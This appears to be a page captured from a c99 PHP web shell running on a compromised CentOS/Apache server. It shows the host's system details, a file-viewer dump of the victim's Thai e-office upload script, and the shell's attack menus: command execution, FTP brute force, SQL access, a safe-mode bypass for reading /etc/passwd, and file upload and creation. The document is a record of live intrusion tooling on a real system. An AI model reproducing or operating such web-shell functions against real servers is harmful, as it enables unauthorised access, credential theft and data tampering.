!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.89 GB of 127.8 GB (39.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectUploadDoc.php (4.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?PHP
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsSysConfig.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocattatchesTmp.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oSys = new sysConfig($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oDatt3 = new Docattatches($oC);
$oDatt1 = new Docattatches($oC);
$oDtmp = new DocattatchesTmp($oC);

if(
$method2!='del'){ echo 'not del';
        
//----------add DocAttatches 
            
$file $_FILES['fileupload']['name'];
            
$sizefile $_FILES['fileupload']['size']; 
            
$filetype=strstr($file,'.');
            
$str $file;    
            
$len=strlen($str);
            
$count=0;  
            for(
$i=0$i<$len$i++){  
                
//echo $str{$i}."<br>"; 
                
$asci=ord($str{$i});
                if(
$asci == 46){
                    
$count++;
                } 
                if(
$asci == 44){

                    
$count++;
                }
            }
            
$oSys->RSsysConfig();
            
$oSys->GetRecord();
            
$oSys->filesizebyte;
            
$sizefileM=($oSys->filesizebyte/1024/1024);
            if(
$count>1){
                        
?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="ชื่อแฟ้มไม่ควรจะประกอบด้วย จุด(.) และ , กรุณาเปลี่ยนชื่อแฟ้ม";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
                        <?
            
}else if($sizefile>$oSys->filesizebyte || $sizefile==0){  //---- 2 MB , 2048 KB
                        
?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror='ขนาดแฟ้มต้องไม่เกิน <?  echo $sizefileM?> MB';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?    
            
}else if($filetype!='.doc' && $filetype!='.xls' && $filetype!='.ppt' && $filetype!='.zip' && $filetype!='.rar' && $filetype!='.odt' && $filetype!='.ods' && $filetype!='.odp' && $filetype!='.pdf' && $filetype!='.jpg' && $filetype!='.gif' && $filetype!='.jpeg' && $filetype!='.png' && $filetype!='.DOC' && $filetype!='.XLS' && $filetype!='.PPT' && $filetype!='.ZIP' && $filetype!='.RAR' && $filetype!='.ODT' && $filetype!='.ODS' && $filetype!='.ODP' && $filetype!='.PDF' && $filetype!='.JPG' && $filetype!='.GIF' && $filetype!='.JPEG' && $filetype!='.PNG'){              
?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="ไม่สามารถอัพโหลดแฟ้มนามสกุล <? echo $filetype?> ได้";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?                    
            
}else{
                        
$timedoc=date('Ymd_His');
                        
$typefile $_FILES['fileupload']['type']; 
                        
$sizefile $_FILES['fileupload']['size']; 
                        list(
$aa$dot) = preg_split("/\./"$file);
                        
$filenamemd5=md5($file);
                        
$tempfile $GLOBALS['path_upload_documents'].$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                    
                        
copy($_FILES['fileupload']['tmp_name'],$tempfile);
                                
//----search DaSeq of DocID
                                
$MaxDaSeq=$oDatt1->SearchMaxDaSeqDocID($DocID);
                                
                                
$oDatt->AddNew();
                                
$oDatt->DaID=$oDatt->GetNextCode();
                                
$oDatt->DocID=$DocID;
                                
$oDatt->DaFileName=$_FILES['fileupload']['name'];
                                
$oDatt->DaUpFileName=$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                                
                                if(
$oDatt3->SearchByDaSeqCount0($DocID)==0){
                                    
$oDatt->DaSeq=$MaxDaSeq+1;
                                }else{
                                    
$oDatt->DaSeq=0;
                                }
                                
                                
$oDatt->Save();


?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='อัพโหลดไฟล์สำเร็จ !';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?    

            
}
}else if(
$method2=='del'){
                        
$oDatt->SearchByKey($selectdel);
                        
$oDatt->GetRecord();
                        
unlink($GLOBALS['path_upload_documents'].$oDatt->DaUpFileName);
                        
$oDatt->Delete();
                        
                        
$oDatt2->SearchByDocIDMoreDaSeq($oDatt->DocID,$oDatt->DaSeq);
                        while(
$oDatt2->GetRecord()){
                            
$oDatt2->Edit();
                            
$oDatt2->DaSeq=$oDatt2->DaSeq-1;
                            
$oDatt2->Save();    
                        }
                        
?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='';
                            window.top.document.getElementById('method2').value="";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                            
                        </script>  
<?
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0111 ]--